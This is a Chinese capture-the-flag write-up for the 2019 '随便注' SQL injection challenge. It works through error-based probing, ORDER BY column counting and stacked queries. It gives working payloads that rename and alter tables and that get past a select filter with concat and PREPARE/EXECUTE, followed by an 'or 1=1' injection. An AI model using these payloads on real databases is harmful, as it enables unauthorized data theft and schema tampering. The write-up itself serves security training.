[强网杯 2019]随便注1

打开题目

[强网杯 2019]随便注1_第1张图片

输入1

[强网杯 2019]随便注1_第2张图片

 输入1',页面报错,输入1' #页面正常

说明1为注入点且注入方式为字符型的单引号注入

判断列名

输入

1' order by 2 # 页面正常

1' order by 3 #页面报错

[强网杯 2019]随便注1_第3张图片

说明列名字段数为2

接下来我们尝试用联合注入的方式爆出数据显示位

输入1' union select 1,2 #

[强网杯 2019]随便注1_第4张图片

可以看到过滤了很多东西

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

说明我们用不了联合注入,因为过滤了union

我们尝试堆叠注入来查看有多少个数据库

1';show databases; #

[强网杯 2019]随便注1_第5张图片

我们查看表名

1';show tables; #

[强网杯 2019]随便注1_第6张图片

可以看到当前数据库下有两个表

1'; show columns from `1919810931114514`;#

这里查询表名使用反单引号
注意:在windows系统下,反单引号(`)是数据库、表、索引、列和别名用的引用符

在这里使用 ` 而不是 ’ 的一些解释:

两者在linux下和windows下不同,linux下不区分,windows下区分。

单引号 ’ 或双引号主要用于 字符串的引用符号

反勾号 ` 数据库、表、索引、列和别名用的是引用符是反勾号 (注:Esc下面的键)

有MYSQL保留字作为字段的,必须加上反引号来区分!!!

如果是数值,请不要使用引号。

可以看到有flag这个列

[强网杯 2019]随便注1_第7张图片

虽然我们已经得到了flag了,但是select被过滤了,而show命令又不能查看值。

这里看wp有一个其他思路

1.

让程序中已经存在的select语法帮我们进行查询,把words改名为其他,191这个表改名为words,然后再添加id字段,将flag字段改为data。

    先将 words 改为别的名字 比如 words2 或者其他
    然后将 1919810931114514 改为 words
    把属性名flag改为id,然后用1’ or 1=1;# 显示flag出来
    在这之前当然要先把words表改名为其他


payload:

1';rename table words to word2;rename table `1919810931114514` to words;ALTER TABLE words ADD id int(10) DEFAULT '12';ALTER TABLE  words CHANGE flag data VARCHAR(100); #

"ALTER TABLE"用于更改表的结构,例如添加、删除或修改表的列,更改列的数据类型,添加或删除索引等。

VARCHAR(100)"是数据库表中列的数据类型和长度的定义。具体来说,"VARCHAR"表示这是一个可变长度字符串数据类型,而括号中的"100"表示该列可以存储的最大字符数为100

"int(10)":这表示这是一个整数数据类型。括号中的数字(10)通常用于指定显示的宽度,但在大多数数据库管理系统中,它只是用于显示目的,而不会影响实际存储或范围。这个整数列将存储整数值。

"DEFAULT '12'":这表示当插入一行时,如果没有为这个列提供值,将使用默认值'12'。这意味着如果没有明确指定值,新插入的行将自动在这个列中包含整数值12。

综合起来,"int(10) DEFAULT '12'"定义了一个整数列,它将存储整数值,并且如果没有提供值,则默认值为12。这意味着在插入新行时,如果没有显式提供这个列的值,它将自动设置为12。

[强网杯 2019]随便注1_第8张图片

然后我们用万能密码登录一下

1' or 1=1 #

[强网杯 2019]随便注1_第9张图片

得到flag

2.用concat拼接

1’;use supersqli;set @sql=concat('s','elect flag from 1919810931114514');PREPARE stmt1 FROM @sql;EXECUTE stmt1 #

 

你可能感兴趣的:(sql,数据库)